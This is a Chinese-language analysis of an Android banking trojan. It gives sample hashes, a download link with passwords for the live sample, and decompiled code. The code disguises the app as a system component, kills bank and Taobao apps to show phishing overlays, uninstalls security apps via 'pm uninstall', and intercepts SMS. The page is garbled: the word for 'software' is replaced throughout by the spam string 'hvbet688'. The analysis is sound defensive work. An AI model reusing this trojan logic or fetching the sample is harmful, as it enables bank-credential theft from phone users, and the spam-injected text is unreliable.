android病毒“银行悍匪”独家分析

一、  病毒样本基本信息

FileName: b5910a432d2b866e1028f31874edb32f .apk
File MD5: b5910a432d2b866e1028f31874edb32f

SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1

File Size: 829006 Byte

Package:langthing.nend   

Download:http://yunpan.cn/Q4qHuRLaNivtd    访问密码 3a90     解压密码:52pojie

// 该病毒首先伪装成系统程序防止卸载;然后试着去卸载安全hvbet688;监测各种银行应用;对需要拦截短信的关键字进行了加密,增加了分析的难度;没有MAIN和LAUNCHER组件,安装后没有图标,防止用户察觉到安装了应用

二、  病毒代码分析

查看AndroidManifest.xml配置文件,可以发现赋予了病毒非常多的权限,且是高危的权限,例如发送短信、拨打电话、读取日志文件、重启应用程序等等,且没有MAIN和LAUNCHER组件

<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"

  xmlns:android="http://schemas.android.com/apk/res/android">

    <uses-permission android:name="android.permission.RECEIVE_SMS" />  //接收短信

    <uses-permission android:name="android.permission.SEND_SMS" />      //发送短信

    <uses-permission android:name="android.permission.READ_SMS" />     //读取短息

    <uses-permission android:name="android.permission.WRITE_SMS" />  //编辑短信

    <uses-permission android:name="android.permission.SEND_SMS" />

    <uses-permission android:name="android.permission.READ_CONTACTS" />    //读取通讯录

    <uses-permission android:name="android.permission.WRITE_SETTINGS" />   //读取系统设置的数据库权限

    <uses-permission android:name="android.permission.READ_LOGS" />           //读取日志文件

    <uses-permission android:name="android.permission.WRITE_CONTACTS" />//编辑通讯录联系人

    <uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态

    <uses-permission android:name="android.permission.CALL_PHONE" />         //拨打电话

    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//接收开机信息

    <uses-permission android:name="android.permission.GET_TASKS" />  //获取运行程序信息

<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启应用程序

查看AndroidManifest.xml配置文件,可以发现当手机接收到TReceiver、eviceAdminReceiver、Alarmreceiver等组件时就会启动程序

receiver android:name=".TReceiver">

            <intent-filter android:priority="2147483647">

                <action android:name="android.intent.action.BOOT_COMPLETED" />

            </intent-filter>

        </receiver>

        <receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">

            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />

            <intent-filter>

                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />

            </intent-filter>

        </receiver>

        <receiver android:name=".Alarmreceiver">

            <intent-filter>

                <action android:name="arui.alarm.action" />

            </intent-filter>

        </receiver>

        <receiver android:name=".ShutdownReceiver">

            <intent-filter>

                <action android:name="android.intent.action.ACTION_SHUTDOWN" />

            </intent-filter>

恶意注入代码的代码树如下:

 

当程序安装后,会伪装成系统程序,防止卸载。如图:

 

查看langthing.nend.main伪装成系统代码如下:

private void b()

  {

    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");

    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);

    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------");  //  伪装成系统应用

    startActivityForResult(localIntent, 1);

  }

当应用监测到银行客户端启动时,就会终止个银行进程,并为工商银行、淘宝等定制了高仿真“钓鱼界面”

private void e()

  {

    ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;

    ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");

    String str = localComponentName.getClassName();

    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))

    {

      if (a(getApplicationContext(), "com.icbc"))

        localActivityManager.restartPackage("com.icbc");

      if (a(getApplicationContext(), "com.chinamworld.main"))

        localActivityManager.restartPackage("com.chinamworld.main");

      if (a(getApplicationContext(), "com.bankcomm"))

        localActivityManager.restartPackage("com.bankcomm");

      if (a(getApplicationContext(), "com.taobao.taobao"))

        localActivityManager.restartPackage("com.taobao.taobao");

      if (a(getApplicationContext(), "com.android.bankabc"))

        localActivityManager.restartPackage("com.android.bankabc");

      if (a(getApplicationContext(), "cmb.pb"))

        localActivityManager.restartPackage("cmb.pb");

      if (a(getApplicationContext(), "com.rytong.bankgdb"))

        localActivityManager.restartPackage("com.rytong.bankgdb");

      if (a(getApplicationContext(), "com.cib.bankcib"))

        localActivityManager.restartPackage("com.cib.bankcib");

      if (a(getApplicationContext(), "com.rytong.bankps"))

        localActivityManager.restartPackage("com.rytong.bankps");

      if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))

        localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");

      if (a(getApplicationContext(), "com.ecitic.bank.mobile"))

        localActivityManager.restartPackage("com.ecitic.bank.mobile");

      if (a(getApplicationContext(), "com.cebbank.bankebb"))

        localActivityManager.restartPackage("com.cebbank.bankebb");

      if (a(getApplicationContext(), "cn.com.cmbc.mbank"))

        localActivityManager.restartPackage("cn.com.cmbc.mbank");

      if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))

        localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");

      if (a(getApplicationContext(), "com.pingan.pabank.activity"))

        localActivityManager.restartPackage("com.pingan.pabank.activity");

      if (a(getApplicationContext(), "com.gzrcb.mobilebank"))

        localActivityManager.restartPackage("com.gzrcb.mobilebank");

      if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))

        localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");

      if (a(getApplicationContext(), "com.chinamworld.bocmbci"))

        localActivityManager.restartPackage("com.chinamworld.bocmbci");

      if (a(getApplicationContext(), "com.rytong.app.bankhx"))

        localActivityManager.restartPackage("com.rytong.app.bankhx");

      if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))

        localActivityManager.restartPackage("com.csii.huzhou.mobilebank");

      if (a(getApplicationContext(), "cn.com.shbank.mper"))

        localActivityManager.restartPackage("cn.com.shbank.mper");

      if (a(getApplicationContext(), "com.rytong.bankqd"))

        localActivityManager.restartPackage("com.rytong.bankqd");

      if (a(getApplicationContext(), "com.tlbank"))

        localActivityManager.restartPackage("com.tlbank");

      if (a(getApplicationContext(), "com.sookin.scyh"))

        localActivityManager.restartPackage("com.sookin.scyh");

      if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))

        localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");

      if (a(getApplicationContext(), "com.chinamworld.klb"))

        localActivityManager.restartPackage("com.chinamworld.klb");

}

if (str.contains("icbc"))

    {

      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);

      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))

      {

        localActivityManager.restartPackage("com.icbc");

        new Intent("android.intent.action.MAIN");

        Intent localIntent53 = new Intent("android.intent.action.MAIN");

        localIntent53.setFlags(268435456);

        localIntent53.addCategory("android.intent.category.HOME");

        startActivity(localIntent53);

        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);

        localIntent54.setFlags(268435456);

        startActivity(localIntent54);

      }

    }

    if (str.contains("com.chinamworld.main"))

    {

      Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);

      if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))

      {

        localActivityManager.restartPackage("com.chinamworld.main");

        new Intent("android.intent.action.MAIN");

        Intent localIntent51 = new Intent("android.intent.action.MAIN");

        localIntent51.setFlags(268435456);

        localIntent51.addCategory("android.intent.category.HOME");

        startActivity(localIntent51);

        Intent localIntent52 = new Intent(getApplicationContext(), js.class);

        localIntent52.setFlags(268435456);

        startActivity(localIntent52);

      }

    }

    if (str.contains("bankcomm"))

    {

      Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);

      if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))

      {

        localActivityManager.restartPackage("com.bankcomm");

        new Intent("android.intent.action.MAIN");

        Intent localIntent49 = new Intent("android.intent.action.MAIN");

        localIntent49.setFlags(268435456);

        localIntent49.addCategory("android.intent.category.HOME");

        startActivity(localIntent49);

        Intent localIntent50 = new Intent(getApplicationContext(), jt.class);

        localIntent50.setFlags(268435456);

        startActivity(localIntent50);

      }

    }

    if (str.contains("taobao"))

    {

      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);

      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))

      {

        localActivityManager.restartPackage("com.taobao.taobao");

        new Intent("android.intent.action.MAIN");

        Intent localIntent47 = new Intent("android.intent.action.MAIN");

        localIntent47.setFlags(268435456);

        localIntent47.addCategory("android.intent.category.HOME");

        startActivity(localIntent47);

        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);

        localIntent48.setFlags(268435456);

        startActivity(localIntent48);

      }

//  终止各银行进程

查找安全hvbet688并卸载安全hvbet688

for (g = "Already root"; ; g = "NOroot")

   {

     this.C = 5;

     this.E = 5;

     this.B = new String[this.C];

     this.D = new String[this.E];

     this.B[0] = "pm uninstall com.qihoo360.mobilesafe";     //卸载360、腾讯、金山等相关的安全hvbet688

     this.B[1] = "pm uninstall com.tencent.qqpimsecure"; 

     this.B[2] = "pm uninstall com.ijinshan.mguard";       

     this.B[3] = "pm uninstall com.ijinshan.duba";           

     this.B[4] = "pm uninstall com.anguanjia.safe";

     this.D[0] = "com.qihoo360.mobilesafe";

     this.D[1] = "com.tencent.qqpimsecure";

     this.D[2] = "com.ijinshan.mguard";

     this.D[3] = "com.ijinshan.duba";

     this.D[4] = "com.anguanjia.safe";

     this.s = new o();

拦截相关短信:

f (i5 == 1)

          if ((server.f == 0) && (server.a != i3))

          {

            server.a(this.a, 1);

            server.b(this.a, i3);

            str4 = "接收";

            server.a(this.a, new o());

            String str5 = server.d(this.a).a(this.a.getApplicationContext());

            server.a(this.a, new n());

            server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);

            localStringBuilder.append("[ ");

            localStringBuilder.append(str1 + ", ");

            localStringBuilder.append(i4 + ", ");

            localStringBuilder.append(str2 + ", ");

            localStringBuilder.append(str3 + ", ");

            localStringBuilder.append(str4);

            localStringBuilder.append(" ]/n/n");

            if (!localCursor1.isClosed())

              localCursor1.close();

          }

      }

      while (true)

      {

        localStringBuilder.append("getSmsInPhone has executed!");

        super.onChange(paramBoolean);

        return;

        server.f = 0;

        break;

        if (i5 != 2)

          break;

        if (server.b == i3)

          break label760;

        Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");

        if (localCursor2.moveToFirst())

        {

          localCursor2.getColumnIndex("_id");

          int i6 = localCursor2.getColumnIndex("sSend");

          do

            server.a(this.a, localCursor2.getString(i6));

          while (localCursor2.moveToNext());

        }

        localCursor2.close();

        if (server.h(this.a).equals("1"))

        {

          server.a(this.a, new o());

          server.a(this.a, new n());

          String str6 = server.d(this.a).a(this.a.getApplicationContext());

          server.a(this.a, str2 + ";" + str1, str6);

        }

        server.b = i3;

        str4 = "发送";

        break;

        localStringBuilder.append("no result!");

      }

    }

    catch (SQLiteException localSQLiteException)

    {

      while (true)

      {

        continue;

        label760: String str4 = "null";

      }

    }

  }

}

解密密钥:

public void a()

  {

    try

    {

      InputStream localInputStream = getAssets().open("unhi.db");     // 密钥

      FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");

      byte[] arrayOfByte = new byte[1024];

      while (true)

      {

        int i1 = localInputStream.read(arrayOfByte);

        if (i1 <= 0)

        {

          localFileOutputStream.flush();

          localFileOutputStream.close();

          localInputStream.close();

          return;

        }

        localFileOutputStream.write(arrayOfByte, 0, i1);

      }

    }

    catch (Exception localException)

    {

    }

  }

  public void a(String paramString)

  {

    if (!new File(paramString).exists())

      a();

  }

  public void c()

  {

    new l(this).start();

  }

  public IBinder onBind(Intent paramIntent)

  {

    return null;

  }

  public void onCreate()

  {

    this.u = new e();

    IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");

    localIntentFilter.setPriority(2147483647);

    registerReceiver(this.u, localIntentFilter);

    p = (ActivityManager)getSystemService("activity");

    this.F = 0;

this.j = false;

b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);

      this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");

      a(this.q + "unhi.db");

      c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);

      m localm = new m(this, new Handler());

      getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);

      Intent localIntent = new Intent(getApplicationContext(), log.class);

      localIntent.setFlags(268435456);

      startService(localIntent);


 

三、  总结

该病毒尝试着去卸载安全hvbet688;采用了加密技术,增加了分析难度;并隐藏运行界面,防止用户察觉。可以看出移动安全问题越演越烈,且手段越来越高明,增加了分析难度。

// 由于本人对于密码学方面还没有Hello World的水平,所以无法解密相关信息,水平有限。

网友评论
最新图文
  • android病毒“银行悍匪”独家分析

    一、病毒样本基本信息FileName: b5910a432d2b866e1028f31874edb32f .apkFile MD5: b5910a432d2b866e1028f31874edb32fSHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1File Size: 829006 BytePackage:langthing.nend D,西西hvbet688园-最安全的下载资讯站。

  • cf三尸蛊是什么?CF三尸蛊病毒之庖丁解牛

    电脑管家云安全中心监测发现,近期一款名为“CF三尸蛊”的CF盗号木马四处蔓延。这是一款带驱动的MBR型木马,属于远控木马,隐藏性高、内部瓦解、持久性强。黑客通过CF游戏外挂捆绑此木马病毒进行盗号,CF游戏玩家需要提高警惕。 ,西西hvbet688园-最安全的下载资讯站。

  • 安卓“推箱子”带木马 安全管家Hold住

    专业手机杀毒hvbet688安全管家查杀安卓 “推箱子木马”,将恶意代码内嵌到“推箱子”手机游戏hvbet688中,发布在安卓各个市场和论坛,进行扩散。木马恶意行为:“推箱子木马”私自下载流氓hvbet688并静默安装(流氓hvbet688为伪装的谷歌地图),且无法删除流氓hvbet688,并将手,西西hvbet688园-最安全的下载资讯站。

  • 腾讯移动安全实验室公布手机吸费病毒的工作原理

    随着移动互联网的快速发展,手机吸费病毒作为一种新的手机病毒形式开始进入人们的视线。“吸费海盗王”、“美女勾魂吸费大盗”等吸费病毒近期陆续被腾讯移动安全实验室等手机安全机构公之于众,被查获的病毒不仅覆盖了Android、Symbian V3 V5等智能机操作系统、也覆,西西hvbet688园-最安全的下载资讯站。

  • 使用PowerTool轻松检测魔影病毒(TDSS.TDL-4)

    就不过多重复了,为了保护自己的篡改的MBR,可谓是用尽可手段,PowerTool可以在不恢复和修改TDL-4任何钩子的情况下,直接穿透它的防护,检测到TDL-4 rootkitPowerTool 下载:http://www.cr173.com/soft/5029.html首先,有两个地方,大家可能以前就知道了,一,西西hvbet688园-最安全的下载资讯站。